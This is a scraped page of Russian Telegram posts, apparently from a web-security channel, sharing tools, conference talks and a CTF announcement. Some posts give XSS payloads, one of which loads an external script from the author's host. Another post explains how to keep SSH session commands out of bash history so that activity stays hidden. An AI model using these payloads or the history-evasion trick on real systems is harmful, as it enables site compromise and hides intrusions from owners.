Кавычка – Telegram
Кавычка
16.4K subscribers
83 photos
2 videos
12 files
184 links
Практическая безопасность. Уязвимости и атаки на веб-приложения.

Чат @WebPwnChat

Только авторский контент, без репостов и рекламы (простите).

Вместо лайка:
https://news.1rj.ru/str/webpwn?boost

Платный канал:
https://news.1rj.ru/str/tribute/app?startapp=s2Vr
Download Telegram
Кстати говоря, fuzz.txt (bo0om.ru/fuzz.txt) вошёл как дефолтный словарь в dirsearch.

https://github.com/maurosoria/dirsearch

Надо про него потом еще написать :)
❤‍🔥1
VK - история одного взлома
https://bo0om.ru/vk-xxe-hack
❤‍🔥1
❤‍🔥1
Channel name was changed to «bo0om.ru»
Все хакеры - как хакеры. А я - богиня!
❤‍🔥1
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.

Трансляция тут https://channel9.msdn.com/
❤‍🔥1
У тебя спина белая
Классика
Один из коротких векторов для выполнения JS при XSS атаке:
<q/oncut=alert()>X

Событие oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X.
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
❤‍🔥1
А это более прикольная альтернатива alert'у
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">

Хоть и боян
❤‍🔥1
А вот и доклады с defcon russia подъехали!

Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz

Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
❤‍🔥1
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить kill -9 $$

Это убет собственный процесс, а последние команды в .bash_history не запишутся.

Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
❤‍🔥1
Кстати, ночью стартует HackQuest!
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
❤‍🔥1
Итак, стартует HackQuest

telegram.me/wlrm_phd_hq_bot

А вот и ссылка на участие :)

Да-да, прямо в telegram!

Удачи!
❤‍🔥1